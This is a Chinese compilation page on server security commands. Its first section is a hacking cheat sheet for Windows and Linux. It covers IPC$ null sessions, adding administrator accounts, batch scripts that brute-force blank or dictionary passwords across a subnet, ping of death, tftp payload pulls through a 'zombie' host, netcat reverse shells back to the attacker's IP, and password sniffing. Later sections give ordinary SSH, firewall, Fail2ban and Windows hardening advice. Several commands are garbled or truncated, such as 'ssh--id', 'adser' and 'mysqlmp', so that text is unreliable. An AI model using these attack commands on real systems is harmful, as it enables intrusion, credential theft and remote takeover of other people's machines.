伺服器安全命令

『壹』 求安全模式的所有命令

net use \\ip\ipc$ " " /user:" " 建立IPC空鏈接
net use \\ip\ipc$ "密碼" /user:"用戶名" 建立IPC非空鏈接
net use h: \\ip\c$ "密碼" /user:"用戶名" 直接登陸後映射對方C：到本地為H:
net use h: \\ip\c$ 登陸後映射對方C：到本地為H:
net use \\ip\ipc$ /del 刪除IPC鏈接
net use h: /del 刪除映射對方到本地的為H:的映射
net user 用戶名 密碼 /add 建立用戶
net user guest /active:yes 激活guest用戶
net user 查看有哪些用戶
net user 帳戶名 查看帳戶的屬性
net localgroup administrators用戶名 /add 把「用戶」添加到管理員中使其具有管理員許可權,注意：administrator後加s用復數
net start 查看開啟了哪些服務 net localgroup administrators 用戶名 /add
net start 服務名 開啟服務；(如:net start telnet， net start schele)
net stop 服務名 停止某服務
net time \\目標ip 查看對方時間
net time \\目標ip /set 設置本地計算機時間與「目標IP」主機的時間同步,加上參數/yes可取消確認信息
net view 查看本地區域網內開啟了哪些共享
net view \\ip 查看對方區域網內開啟了哪些共享
net config 顯示系統網路設置
net logoff 斷開連接的共享
net pause 服務名 暫停某服務
net send ip "文本信息" 向對方發信息
net ver 區域網內正在使用的網路連接類型和信息
net share 查看本地開啟的共享
net share ipc$ 開啟ipc$共享
net share ipc$ /del 刪除ipc$共享
net share c$ /del 刪除C：共享
net user guest 12345 用guest用戶登陸後用將密碼改為12345
net password 密碼 更改系統登陸密碼
netstat -a 查看開啟了哪些埠,常用netstat -an
netstat -n 查看埠的網路連接情況，常用netstat -an
netstat -v 查看正在進行的工作
netstat -p 協議名 例：netstat -p tcq/ip 查看某協議使用情況（查看tcp/ip協議使用情況）
netstat -s 查看正在使用的所有協議使用情況
nbtstat -A ip 對方136到139其中一個埠開了的話，就可查看對方最近登陸的用戶名（03前的為用戶名）-注意：參數-A要大寫
tracert -參數 ip(或計算機名) 跟蹤路由（數據包），參數：「-w數字」用於設置超時間隔。
ping ip(或域名) 向對方主機發送默認大小為32位元組的數據，參數：「-l[空格]數據包大小」；「-n發送數據次數」；「-t」指一直ping。
ping -t -l 65550 ip 死亡之ping(發送大於64K的文件並一直ping就成了死亡之ping)
ipconfig (winipcfg) 用於windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用參數「/all」顯示全部配置信息
tlist -t 以樹行列表顯示進程(為系統的附加工具，默認是沒有安裝的，在安裝目錄的Support/tools文件夾內)
kill -F 進程名 加-F參數後強制結束某進程(為系統的附加工具，默認是沒有安裝的，在安裝目錄的Support/tools文件夾內)
del -F 文件名 加-F參數後就可刪除只讀文件,/AR、/AH、/AS、/AA分別表示刪除只讀、隱藏、系統、存檔文件，/A-R、/A-H、/A-S、/A-A表示刪除除只讀、隱藏、系統、存檔以外的文件。例如「DEL/AR *.*」表示刪除當前目錄下所有隻讀文件，「DEL/A-S *.*」表示刪除當前目錄下除系統文件以外的所有文件
#2 二：
del /S /Q 目錄 或用：rmdir /s /Q 目錄 /S刪除目錄及目錄下的所有子目錄和文件。同時使用參數/Q 可取消刪除操作時的系統確認就直接刪除。（二個命令作用相同）
move 盤符\路徑\要移動的文件名 存放移動文件的路徑\移動後文件名 移動文件,用參數/y將取消確認移動目錄存在相同文件的提示就直接覆蓋
fc one.txt two.txt > 3st.txt 對比二個文件並把不同之處輸出到3st.txt文件中，"> "和"> >" 是重定向命令
at id號 開啟已注冊的某個計劃任務
at /delete 停止所有計劃任務，用參數/yes則不需要確認就直接停止
at id號 /delete 停止某個已注冊的計劃任務
at 查看所有的計劃任務
at \\ip time 程序名(或一個命令) /r 在某時間運行對方某程序並重新啟動計算機
finger username @host 查看最近有哪些用戶登陸
telnet ip 埠 遠和登陸伺服器,默認埠為23
open ip 連接到IP（屬telnet登陸後的命令）
telnet 在本機上直接鍵入telnet 將進入本機的telnet
路徑\文件名1 路徑\文件名2 /y 復制文件1到指定的目錄為文件2，用參數/y就同時取消確認你要改寫一份現存目錄文件
c:\srv.exe \\ip\admin$ 復制本地c:\srv.exe到對方的admin下
cppy 1st.jpg/b+2st.txt/a 3st.jpg 將2st.txt的內容藏身到1st.jpg中生成3st.jpg新的文件，註：2st.txt文件頭要空三排，參數：/b指二進制文件，/a指ASCLL格式文件
\\ip\admin$\svv.exe c:\ 或:\\ip\admin$\*.* 復制對方admini$共享下的srv.exe文件（所有文件）至本地C：
x 要復制的文件或目錄樹 目標地址\目錄名 復制文件和目錄樹，用參數/Y將不提示覆蓋相同文件
tftp -i 自己IP(用肉機作跳板時這用肉機IP) get server.exe c:\server.exe 登陸後，將「IP」的server.exe下載到目標主機c:\server.exe 參數：-i指以二進制模式傳送，如傳送exe文件時用，如不加-i 則以ASCII模式（傳送文本文件模式）進行傳送
tftp -i 對方IP put c:\server.exe 登陸後，上傳本地c:\server.exe至主機
ftp ip 埠 用於上傳文件至伺服器或進行文件操作，默認埠為21。bin指用二進制方式傳送（可執行文件進）；默認為ASCII格式傳送(文本文件時)
route print 顯示出IP路由，將主要顯示網路地址Network addres，子網掩碼Netmask，網關地址Gateway addres，介面地址Interface
arp 查看和處理ARP緩存，ARP是名字解析的意思，負責把一個IP解析成一個物理性的MAC地址。arp -a將顯示出全部信息
start 程序名或命令 /max 或/min 新開一個新窗口並最大化（最小化）運行某程序或命令
mem 查看cpu使用情況
attrib 文件名(目錄名) 查看某文件（目錄）的屬性
attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存檔，只讀，系統，隱藏 屬性；用＋則是添加為某屬性
dir 查看文件，參數：/Q顯示文件及目錄屬系統哪個用戶，/T:C顯示文件創建時間，/T:A顯示文件上次被訪問時間，/T:W上次被修改時間 date /t 、 time /t 使用此參數即「DATE/T」、「TIME/T」將只顯示當前日期和時間，而不必輸入新日期和時間
set 指定環境變數名稱=要指派給變數的字元 設置環境變數
set 顯示當前所有的環境變數
set p(或其它字元) 顯示出當前以字元p(或其它字元)開頭的所有環境變數
pause 暫停批處理程序，並顯示出：請按任意鍵繼續....
if 在批處理程序中執行條件處理（更多說明見if命令及變數）
goto 標簽 將cmd.exe導向到批處理程序中帶標簽的行（標簽必須單獨一行，且以冒號打頭，例如：「：start」標簽）
call 路徑\批處理文件名 從批處理程序中調用另一個批處理程序 （更多說明見call /?）
for 對一組文件中的每一個文件執行某個特定命令（更多說明見for命令及變數）
echo on或off 打開或關閉echo，僅用echo不加參數則顯示當前echo設置
echo 信息 在屏幕上顯示出信息
echo 信息 >> pass.txt 將"信息"保存到pass.txt文件中
findstr "Hello" aa.txt 在aa.txt文件中尋找字元串hello
find 文件名 查找某文件
title 標題名字 更改CMD窗口標題名字
color 顏色值 設置cmd控制台前景和背景顏色；0＝黑、1＝藍、2＝綠、3＝淺綠、4＝紅、5＝紫、6＝黃、7=白、8=灰、9=淡藍、A＝淡綠、B=淡淺綠、C=淡紅、D=淡紫、E=淡黃、F=亮白
prompt 名稱 更改cmd.exe的顯示的命令提示符(把C:\、D:\統一改為：EntSky\ )
#3 三：
ver 在DOS窗口下顯示版本信息
winver 彈出一個窗口顯示版本信息（內存大小、系統版本、補丁版本、計算機名）
format 盤符 /FS:類型 格式化磁碟,類型:FAT、FAT32、NTFS ,例：Format D: /FS:NTFS
md 目錄名 創建目錄
replace 源文件 要替換文件的目錄 替換文件
ren 原文件名 新文件名 重命名文件名
tree 以樹形結構顯示出目錄，用參數-f 將列出第個文件夾中文件名稱
type 文件名 顯示文本文件的內容
more 文件名 逐屏顯示輸出文件
doskey 要鎖定的命令＝字元
doskey 要解鎖命令= 為DOS提供的鎖定命令(編輯命令行，重新調用win2k命令，並創建宏)。如：鎖定dir命令：doskey dir=entsky (不能用doskey dir=dir)；解鎖：doskey dir=
taskmgr 調出任務管理器
chkdsk /F D: 檢查磁碟D並顯示狀態報告；加參數/f並修復磁碟上的錯誤
tlntadmn telnt服務admn,鍵入tlntadmn選擇3，再選擇8,就可以更改telnet服務默認埠23為其它任何埠
exit 退出cmd.exe程序或目前，用參數/B則是退出當前批處理腳本而不是cmd.exe
path 路徑\可執行文件的文件名 為可執行文件設置一個路徑。
cmd 啟動一個win2K命令解釋窗口。參數：/eff、/en 關閉、開啟命令擴展；更我詳細說明見cmd /?
regedit /s 注冊表文件名 導入注冊表；參數/S指安靜模式導入，無任何提示；
regedit /e 注冊表文件名 導出注冊表
cacls 文件名 參數 顯示或修改文件訪問控制列表（ACL）——針對NTFS格式時。參數：/D 用戶名:設定拒絕某用戶訪問；/P 用戶名:perm 替換指定用戶的訪問許可權；/G 用戶名:perm 賦予指定用戶訪問許可權；Perm 可以是: N 無，R 讀取， W 寫入， C 更改(寫入)，F 完全控制；例：cacls D:\test.txt /D pub 設定d:\test.txt拒絕pub用戶訪問。
cacls 文件名 查看文件的訪問用戶許可權列表
REM 文本內容 在批處理文件中添加註解
netsh 查看或更改本地網路配置情況
#4 四：
IIS服務命令：
iisreset /reboot 重啟win2k計算機（但有提示系統將重啟信息出現）
iisreset /start或stop 啟動（停止）所有Internet服務
iisreset /restart 停止然後重新啟動所有Internet服務
iisreset /status 顯示所有Internet服務狀態
iisreset /enable或disable 在本地系統上啟用（禁用）Internet服務的重新啟動
iisreset /rebootonerror 當啟動、停止或重新啟動Internet服務時，若發生錯誤將重新開機
iisreset /noforce 若無法停止Internet服務，將不會強制終止Internet服務
iisreset /timeout Val在到達逾時間（秒）時，仍未停止Internet服務，若指定/rebootonerror參數，則電腦將會重新開機。預設值為重新啟動20秒，停止60秒，重新開機0秒。
FTP 命令： (後面有詳細說明內容)
ftp的命令行格式為:
ftp －v －d －i －n －g[主機名] －v 顯示遠程伺服器的所有響應信息。
－d 使用調試方式。
－n 限制ftp的自動登錄,即不使用.netrc文件。
－g 取消全局文件名。
help [命令] 或 ？[命令] 查看命令說明
bye 或 quit 終止主機FTP進程,並退出FTP管理方式.
pwd 列出當前遠端主機目錄
put 或 send 本地文件名 [上傳到主機上的文件名] 將本地一個文件傳送至遠端主機中
get 或 recv [遠程主機文件名] [下載到本地後的文件名] 從遠端主機中傳送至本地主機中
mget [remote-files] 從遠端主機接收一批文件至本地主機
mput local-files 將本地主機中一批文件傳送至遠端主機
dir 或 ls [remote-directory] [local-file] 列出當前遠端主機目錄中的文件.如果有本地文件,就將結果寫至本地文件
ascii 設定以ASCII方式傳送文件(預設值)
bin 或 image 設定以二進制方式傳送文件
bell 每完成一次文件傳送,報警提示
cp 返回上一級目錄
close 中斷與遠程伺服器的ftp會話(與open對應)
open host[port] 建立指定ftp伺服器連接,可指定連接埠
delete 刪除遠端主機中的文件
mdelete [remote-files] 刪除一批文件
mkdir directory-name 在遠端主機中建立目錄
rename [from] [to] 改變遠端主機中的文件名
rmdir directory-name 刪除遠端主機中的目錄
status 顯示當前FTP的狀態
system 顯示遠端主機系統類型
user user-name [password] [account] 重新以別的用戶名登錄遠端主機
open host [port] 重新建立一個新的連接
prompt 交互提示模式
macdef 定義宏命令
lcd 改變當前本地主機的工作目錄,如果預設,就轉到當前用戶的HOME目錄
chmod 改變遠端主機的文件許可權
case 當為ON時,用MGET命令拷貝的文件名到本地機器中,全部轉換為小寫字母
cd remote－dir 進入遠程主機目錄
cp 進入遠程主機目錄的父目錄
! 在本地機中執行交互shell，exit回到ftp環境,如!ls＊.zip
#5 五：
MYSQL 命令：
mysql -h主機地址 -u用戶名 －p密碼 連接MYSQL;如果剛安裝好MYSQL，超級用戶root是沒有密碼的。
（例：mysql -h110.110.110.110 -Uroot -P123456
注:u與root可以不用加空格，其它也一樣）
exit 退出MYSQL
mysqladmin -u用戶名 -p舊密碼 password 新密碼 修改密碼
grant select on 資料庫.* to 用戶名@登錄主機 identified by \"密碼\"; 增加新用戶。（注意：和上面不同，下面的因為是MYSQL環境中的命令，所以後面都帶一個分號作為命令結束符）
show databases; 顯示資料庫列表。剛開始時才兩個資料庫：mysql和test。mysql庫很重要它裡面有MYSQL的系統信息，我們改密碼和新增用戶，實際上就是用這個庫進行操作。
use mysql；
show tables; 顯示庫中的數據表
describe 表名; 顯示數據表的結構
create database 庫名; 建庫
use 庫名；
create table 表名 (欄位設定列表)； 建表
drop database 庫名;
drop table 表名； 刪庫和刪表
delete from 表名; 將表中記錄清空
select * from 表名; 顯示表中的記錄
mysqlmp --opt school>school.bbb 備份資料庫：（命令在DOS的\\mysql\\bin目錄下執行）;注釋:將資料庫school備份到school.bbb文件，school.bbb是一個文本文件，文件名任取，打開看看你會有新發現。
win2003系統下新增命令（實用部份）：
shutdown /參數 關閉或重啟本地或遠程主機。
參數說明：/S 關閉主機，/R 重啟主機， /T 數字 設定延時的時間，范圍0～180秒之間， /A取消開機，/M //IP 指定的遠程主機。
例：shutdown /r /t 0 立即重啟本地主機（無延時）
taskill /參數 進程名或進程的pid 終止一個或多個任務和進程。
參數說明：/PID 要終止進程的pid,可用tasklist命令獲得各進程的pid，/IM 要終止的進程的進程名，/F 強制終止進程，/T 終止指定的進程及他所啟動的子進程。
tasklist 顯示當前運行在本地和遠程主機上的進程、服務、服務各進程的進程標識符(PID)。
參數說明：/M 列出當前進程載入的dll文件，/SVC 顯示出每個進程對應的服務，無參數時就只列出當前的進程。
#6 六：
linux系統下基本命令： 要區分大小寫
uname 顯示版本信息（同win2K的 ver）
dir 顯示當前目錄文件,ls -al 顯示包括隱藏文件（同win2K的 dir）
pwd 查詢當前所在的目錄位置
cd cd ..回到上一層目錄，注意cd 與..之間有空格。cd /返回到根目錄。
cat 文件名 查看文件內容
cat >abc.txt 往abc.txt文件中寫上內容。
more 文件名 以一頁一頁的方式顯示一個文本文件。
cp 復制文件
mv 移動文件
rm 文件名 刪除文件，rm -a 目錄名刪除目錄及子目錄
mkdir 目錄名 建立目錄
rmdir 刪除子目錄，目錄內沒有文檔。
chmod 設定檔案或目錄的存取許可權
grep 在檔案中查找字元串
diff 檔案文件比較
find 檔案搜尋
date 現在的日期、時間
who 查詢目前和你使用同一台機器的人以及Login時間地點
w 查詢目前上機者的詳細資料
whoami 查看自己的帳號名稱
groups 查看某人的Group
passwd 更改密碼
history 查看自己下過的命令
ps 顯示進程狀態
kill 停止某進程
gcc 黑客通常用它來編譯C語言寫的文件
su 許可權轉換為指定使用者
telnet IP telnet連接對方主機（同win2K），當出現bash$時就說明連接成功。
ftp ftp連接上某伺服器（同win2K）
附：批處理命令與變數
1：for命令及變數 基本格式：
FOR /參數 %variable IN (set) DO command [command_parameters] %variable:指定一個單一字母可替換的參數，如：%i ，而指定一個變數則用：%%i ，而調用變數時用：%i% ，變數是區分大小寫的（%i 不等於 %I）。
批處理每次能處理的變數從%0—%9共10個，其中%0默認給批處理文件名使用，%1默認為使用此批處理時輸入的的第一個值，同理：%2—%9指輸入的第2-9個值；例：net use \\ip\ipc$ pass /user:user 中ip為%1,pass為%2 ,user為%3
(set):指定一個或一組文件，可使用通配符，如：(D:\user.txt)和(1 1 254)(1 -1 254),{ 「(1 1 254)」第一個"1"指起始值，第二個"1"指增長量，第三個"254"指結束值，即：從1到254；「(1 -1 254)」說明：即從254到1 }
command：指定對第個文件執行的命令，如：net use命令；如要執行多個命令時，命令這間加：& 來隔開
command_parameters：為特定命令指定參數或命令行開關
IN (set)：指在(set)中取值；DO command ：指執行command
參數：/L 指用增量形式{ (set)為增量形式時 }；/F 指從文件中不斷取值，直到取完為止{ (set)為文件時，如(d:\pass.txt)時 }。
用法舉例：
@echo off
echo 用法格式：test.bat *.*.* > test.txt
for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use \\%1.%%G /user:administrator | find "命令成功完成" >>test.txt
存為test.bat 說明：對指定的一個C類網段的254個IP依次試建立administrator密碼為空的IPC$連接，如果成功就把該IP存在test.txt中。
/L指用增量形式（即從1-254或254-1）；輸入的IP前面三位：*.*.*為批處理默認的 %1；%%G 為變數(ip的最後一位）；& 用來隔開echo 和net use 這二個命令；| 指建立了ipc$後，在結果中用find查看是否有"命令成功完成"信息；%1.%%G 為完整的IP地址；(1 1 254) 指起始值，增長量，結止值。
@echo off
echo 用法格式：ok.bat ip
FOR /F %%i IN (D:\user.dic) DO smb.exe %1 %%i D:\pass.dic 200
存為：ok.exe 說明：輸入一個IP後，用字典文件d:\pass.dic來暴解d:\user.dic中的用戶密碼，直到文件中值取完為止。%%i為用戶名；%1為輸入的IP地址（默認）。
#7 七：
2：if命令及變數 基本格式：
IF [not] errorlevel 數字 命令語句 如果程序運行最後返回一個等於或大於指定數字的退出編碼，指定條件為「真」。
例：IF errorlevel 0 命令 指程序執行後返回的值為0時，就值行後面的命令；IF not errorlevel 1 命令指程序執行最後返回的值不等於1，就執行後面的命令。
0 指發現並成功執行（真）；1 指沒有發現、沒執行（假）。
IF [not] 字元串1==字元串2 命令語句 如果指定的文本字元串匹配（即：字元串1 等於 字元串2），就執行後面的命令。
例：「if "%2%"=="4" goto start」指：如果輸入的第二個變數為4時，執行後面的命令（注意：調用變數時就%變數名%並加" "）
IF [not] exist 文件名 命令語句 如果指定的文件名存在，就執行後面的命令。
例：「if not nc.exe goto end」指：如果沒有發現nc.exe文件就跳到":end"標簽處。
IF [not] errorlevel 數字 命令語句 else 命令語句或 IF [not] 字元串1==字元串2 命令語句 else 命令語句或 IF [not] exist 文件名 命令語句 else 命令語句 加上：else 命令語句後指：當前面的條件不成立時，就指行else後面的命令。注意：else 必須與 if 在同一行才有效。 當有del命令時需把del命令全部內容用< >括起來，因為del命令要單獨一行時才能執行，用上< >後就等於是單獨一行了；例如：「if exist test.txt. <del test.txt.> else echo test.txt.missing 」，注意命令中的「.」
（二）系統外部命令(均需下載相關工具)：
1、瑞士軍刀：nc.exe
參數說明：
-h 查看幫助信息
-d 後台模式
-e prog程序重定向，一但連接就執行〔危險〕
-i secs延時的間隔
-l 監聽模式，用於入站連接
-L 監聽模式，連接天閉後仍然繼續監聽，直到CTR+C
-n IP地址，不能用域名
-o film記錄16進制的傳輸
-p[空格]埠 本地埠號
-r 隨機本地及遠程埠
-t 使用Telnet交互方式
-u UDP模式
-v 詳細輸出，用-vv將更詳細
-w數字 timeout延時間隔
-z 將輸入，輸出關掉（用於掃錨時）
基本用法：
nc -nvv 192.168.0.1 80 連接到192.168.0.1主機的80埠
nc -l -p 80 開啟本機的TCP 80埠並監聽
nc -nvv -w2 -z 192.168.0.1 80-1024 掃錨192.168.0.1的80-1024埠
nc -l -p 5354 -t -e c:winntsystem32cmd.exe 綁定remote主機的cmdshell在remote的TCP 5354埠
nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主機的cmdshell並反向連接192.168.0.2的5354埠
高級用法：
nc -L -p 80 作為蜜罐用1：開啟並不停地監聽80埠，直到CTR+C為止
nc -L -p 80 > c:\log.txt 作為蜜罐用2：開啟並不停地監聽80埠，直到CTR+C,同時把結果輸出到c:\log.txt
nc -L -p 80 < c:\honeyport.txt 作為蜜罐用3-1：開啟並不停地監聽80埠，直到CTR+C,並把c:\honeyport.txt中內容送入管道中，亦可起到傳送文件作用
type.exe c:\honeyport | nc -L -p 80 作為蜜罐用3-2：開啟並不停地監聽80埠，直到CTR+C,並把c:\honeyport.txt中內容送入管道中,亦可起到傳送文件作用
本機上用：nc -l -p 本機埠
在對方主機上用：nc -e cmd.exe 本機IP -p 本機埠 *win2K
nc -e /bin/sh 本機IP -p 本機埠 *linux,unix 反向連接突破對方主機的防火牆
本機上用：nc -d -l -p 本機埠 < 要傳送的文件路徑及名稱
在對方主機上用：nc -vv 本機IP 本機埠 > 存放文件的路徑及名稱 傳送文件到對方主機
備 註：
| 管道命令
< 或 > 重定向命令。「<」，例如：tlntadmn < test.txt 指把test.txt的內容賦值給tlntadmn命令
＠ 表示執行＠後面的命令，但不會顯示出來（後台執行）；例：＠dir c:\winnt >> d:\log.txt 意思是：後台執行dir，並把結果存在d:\log.txt中
>與>>的區別 ">"指：覆蓋；">>"指：保存到(添加到）。
如：@dir c:\winnt >> d:\log.txt和@dir c:\winnt > d:\log.txt二個命令分別執行二次比較看：用>>的則是把二次的結果都保存了，而用：>則只有一次的結果，是因為第二次的結果把第一次的覆蓋了。
#8 八：
2、掃錨工具：xscan.exe
基本格式
xscan -host <起始IP>[-<終止IP>] <檢測項目> [其他選項] 掃錨"起始IP到終止IP"段的所有主機信息
xscan -file <主機列表文件名> <檢測項目> [其他選項] 掃錨"主機IP列表文件名"中的所有主機信息
檢測項目
-active 檢測主機是否存活
-os 檢測遠程操作系統類型（通過NETBIOS和SNMP協議）
-port 檢測常用服務的埠狀態
-ftp 檢測FTP弱口令
-pub 檢測FTP服務匿名用戶寫許可權
-pop3 檢測POP3-Server弱口令
-smtp 檢測SMTP-Server漏洞
-sql 檢測SQL-Server弱口令
-smb 檢測NT-Server弱口令
-iis 檢測IIS編碼/解碼漏洞
-cgi 檢測CGI漏洞
-nasl 載入Nessus攻擊腳本
-all 檢測以上所有項目
其它選項
-i 適配器編號 設置網路適配器, <適配器編號>可通過"-l"參數獲取
-l 顯示所有網路適配器
-v 顯示詳細掃描進度
-p 跳過沒有響應的主機
-o 跳過沒有檢測到開放埠的主機
-t 並發線程數量,並發主機數量 指定最大並發線程數量和並發主機數量, 默認數量為100,10
-log 文件名 指定掃描報告文件名 (後綴為：TXT或HTML格式的文件)
用法示例
xscan -host 192.168.1.1-192.168.255.255 -all -active -p 檢測192.168.1.1-192.168.255.255網段內主機的所有漏洞，跳過無響應的主機
xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o 檢測192.168.1.1-192.168.255.255網段內主機的標准埠狀態，NT弱口令用戶，最大並發線程數量為150，跳過沒有檢測到開放埠的主機
xscan -file hostlist.txt -port -cgi -t 200,5 -v -o 檢測「hostlist.txt」文件中列出的所有主機的標准埠狀態，CGI漏洞，最大並發線程數量為200，同一時刻最多檢測5台主機，顯示詳細檢測進度，跳過沒有檢測到開放埠的主機
#9 九：
3、命令行方式嗅探器: xsniff.exe
可捕獲區域網內FTP/SMTP/POP3/HTTP協議密碼
參數說明
-tcp 輸出TCP數據報
-udp 輸出UDP數據報
-icmp 輸出ICMP數據報
-pass 過濾密碼信息
-hide 後台運行
-host 解析主機名
-addr IP地址 過濾IP地址
-port 埠 過濾埠
-log 文件名 將輸出保存到文件
-asc 以ASCII形式輸出
-hex 以16進制形式輸出
用法示例
xsniff.exe -pass -hide -log pass.log 後台運行嗅探密碼並將密碼信息保存在pass.log文件中
xsniff.exe -tcp -udp -asc -addr 192.168.1.1 嗅探192.168.1.1並過濾tcp和udp信息並以ASCII格式輸出
4、終端服務密碼破解: tscrack.exe

『貳』 如何保證Linux伺服器的網路安全

本文將向你介紹基本的 Linux 伺服器安全知識。雖然主要針對 Debian/Ubuntu，但是你可以將此處介紹的所有內容應用於其他 Linux 發行版。我也鼓勵你研究這份材料，並在適當的情況下進行擴展。

1、更新你的伺服器

保護伺服器安全的第一件事是更新本地存儲庫，並通過應用最新的修補程序來升級操作系統和已安裝的應用程序。

在 Ubuntu 和 Debian 上：

$ sudo apt update && sudo apt upgrade -y

在 Fedora、CentOS 或 RHEL：

$ sudo dnf upgrade

2、創建一個新的特權用戶

接下來，創建一個新的用戶帳戶。永遠不要以 root 身份登錄伺服器，而是創建你自己的帳戶（用戶），賦予它 sudo 許可權，然後使用它登錄你的伺服器。

首先創建一個新用戶：

$ adser <username>

通過將 sudo 組（-G）附加（-a）到用戶的組成員身份里，從而授予新用戶帳戶 sudo 許可權：

$ usermod -a -G sudo <username>

3、上傳你的 SSH 密鑰

你應該使用 SSH 密鑰登錄到新伺服器。你可以使用 ssh--id 命令將 預生成的 SSH 密鑰 上傳到你的新伺服器：

$ ssh--id <username>@ip_address

現在，你無需輸入密碼即可登錄到新伺服器。

4、安全強化 SSH

接下來，進行以下三個更改：

• 禁用 SSH 密碼認證

• 限制 root 遠程登錄

• 限制對 IPv4 或 IPv6 的訪問

使用你選擇的文本編輯器打開 /etc/ssh/sshd_config 並確保以下行：

• PasswordAuthentication yes
• PermitRootLogin yes



改成這樣：

• PasswordAuthentication no


• PermitRootLogin no



接下來，通過修改 AddressFamily 選項將 SSH 服務限制為 IPv4 或 IPv6。要將其更改為僅使用 IPv4（對大多數人來說應該沒問題），請進行以下更改：

• AddressFamily inet



重新啟動 SSH 服務以啟用你的更改。請注意，在重新啟動 SSH 服務之前，與伺服器建立兩個活動連接是一個好主意。有了這些額外的連接，你可以在重新啟動 SSH 服務出錯的情況下修復所有問題。

在 Ubuntu 上：

• $ sudo service sshd restart



在 Fedora 或 CentOS 或任何使用 Systemd 的系統上：

• $ sudo systemctl restart sshd



5、啟用防火牆

現在，你需要安裝防火牆、啟用防火牆並對其進行配置，以僅允許你指定的網路流量通過。（Ubuntu 上的） 簡單的防火牆 （UFW）是一個易用的 iptables 界面，可大大簡化防火牆的配置過程。

你可以通過以下方式安裝 UFW：

• $ sudo apt install ufw



默認情況下，UFW 拒絕所有傳入連接，並允許所有傳出連接。這意味著伺服器上的任何應用程序都可以訪問互聯網，但是任何嘗試訪問伺服器的內容都無法連接。

首先，確保你可以通過啟用對 SSH、HTTP 和 HTTPS 的訪問來登錄：

• $ sudo ufw allow ssh


• $ sudo ufw allow http


• $ sudo ufw allow https



然後啟用 UFW：

• $ sudo ufw enable



你可以通過以下方式查看允許和拒絕了哪些服務：

• $ sudo ufw status



如果你想禁用 UFW，可以通過鍵入以下命令來禁用：

• $ sudo ufw disable



你還可以（在 RHEL/CentOS 上）使用 firewall-cmd ，它已經安裝並集成到某些發行版中。

6、安裝 Fail2ban

Fail2ban 是一種用於檢查伺服器日誌以查找重復或自動攻擊的應用程序。如果找到任何攻擊，它會更改防火牆以永久地或在指定的時間內阻止攻擊者的 IP 地址。

你可以通過鍵入以下命令來安裝 Fail2ban：

• $ sudo apt install fail2ban -y



然後復制隨附的配置文件：

• $ sudo cp /etc/fail2ban/jail.conf /etc/fail2ban/jail.local



重啟 Fail2ban：

• $ sudo service fail2ban restart



這樣就行了。該軟體將不斷檢查日誌文件以查找攻擊。一段時間後，該應用程序將建立相當多的封禁的 IP 地址列表。你可以通過以下方法查詢 SSH 服務的當前狀態來查看此列表：

• $ sudo fail2ban-client status ssh



7、移除無用的網路服務

幾乎所有 Linux 伺服器操作系統都啟用了一些面向網路的服務。你可能希望保留其中大多數，然而，有一些你或許希望刪除。你可以使用 ss 命令查看所有正在運行的網路服務：（LCTT 譯註：應該是只保留少部分，而所有確認無關的、無用的服務都應該停用或刪除。）

• $ sudo ss -atpu



ss 的輸出取決於你的操作系統。下面是一個示例，它顯示 SSH（sshd）和 Ngnix（nginx）服務正在偵聽網路並准備連接：

• tcp LISTEN 0 128 *:http *:* users:(("nginx",pid=22563,fd=7))


• tcp LISTEN 0 128 *:ssh *:* users:(("sshd",pid=685,fd=3))



刪除未使用的服務的方式因你的操作系統及其使用的程序包管理器而異。

要在 Debian / Ubuntu 上刪除未使用的服務：

• $ sudo apt purge <service_name>



要在 Red Hat/CentOS 上刪除未使用的服務：

• $ sudo yum remove <service_name>



再次運行 ss -atup 以確認這些未使用的服務沒有安裝和運行。

以上文章來源www.idccoupon.com，歡迎一起交流討論學習。

『叄』 伺服器能進帶命令提示符安全模式么

伺服器也是可以進入帶命令提示符安全模式的。
但是有個前提就是需要是在物理機上進行的操作，如果是遠程桌面的話，是沒辦法進行這類操作的哦。如果是在機房就可以。

為什麼要進入安全模式呢？是伺服器受到了攻擊或者伺服器出了什麼問題了嗎？
對於伺服器安全，建議安裝伺服器安全狗之類的防護軟體來進行防禦、也可以對伺服器進行全面的殺毒掃描操作。

『肆』 伺服器有哪些安全設置

1)、系統安全基本設置

1.安裝說明：系統全部NTFS格式化，重新安裝系統（採用原版win2003）,安裝殺毒軟體(Mcafee)，並將殺毒軟體更新，安裝sp2補釘，安裝IIS（只安裝必須的組件）,安裝SQL2000，安裝.net2.0,開啟防火牆。並將伺服器打上最新的補釘。

2)、關閉不需要的服務

Computer Browser:維護網路計算機更新，禁用

Distributed File System: 區域網管理共享文件，不需要禁用

Distributed linktracking client：用於區域網更新連接信息，不需要禁用

Error reporting service：禁止發送錯誤報告

Microsoft Serch：提供快速的單詞搜索，不需要可禁用

NTLMSecuritysupportprovide：telnet服務和Microsoft Serch用的，不需要禁用

PrintSpooler：如果沒有列印機可禁用

Remote Registry：禁止遠程修改注冊表

Remote Desktop Help Session Manager：禁止遠程協助 其他服務有待核查

3)、設置和管理賬戶

1、將Guest賬戶禁用並更改名稱和描述，然後輸入一個復雜的密碼

2、系統管理員賬戶最好少建，更改默認的管理員帳戶名(Administrator)和描述，密碼最好採用數字加大小寫字母加數字的上檔鍵組合，長度最好不少於10位

3、新建一個名為Administrator的陷阱帳號，為其設置最小的許可權，然後隨便輸入組合的最好不低於20位的密碼

4、計算機配置-Windows設置-安全設置-賬戶策略-賬戶鎖定策略，將賬戶設為「三次登陸無效 時間為30分鍾

5、在安全設置-本地策略-安全選項中將「不顯示上次的用戶名」設為啟用

6、 在安全設置-本地策略-用戶權利分配中將「從網路訪問此計算機」中只保留Internet來賓賬戶、啟動IIS進程賬戶,Aspnet賬戶

7、創建一個User賬戶，運行系統，如果要運行特權命令使用Runas命令。

4）、打開相應的審核策略

審核策略更改:成功

審核登錄事件:成功,失敗

審核對象訪問:失敗

審核對象追蹤:成功,失敗

審核目錄服務訪問:失敗

審核特權使用:失敗

審核系統事件:成功,失敗

審核賬戶登錄事件:成功,失敗

審核賬戶管理:成功,失敗

5）、 其它安全相關設置

1、禁止C$、D$、ADMIN$一類的預設共享

HKEY_LOCAL_，在右邊的 窗口中新建Dword值，名稱設為AutoShareServer值設為0

2、解除NetBios與TCP/IP協議的綁定

右擊網上鄰居-屬性-右擊本地連接-屬性-雙擊Internet協議-高級-Wins-禁用TCP/IP上的 NETBIOS

3、隱藏重要文件/目錄

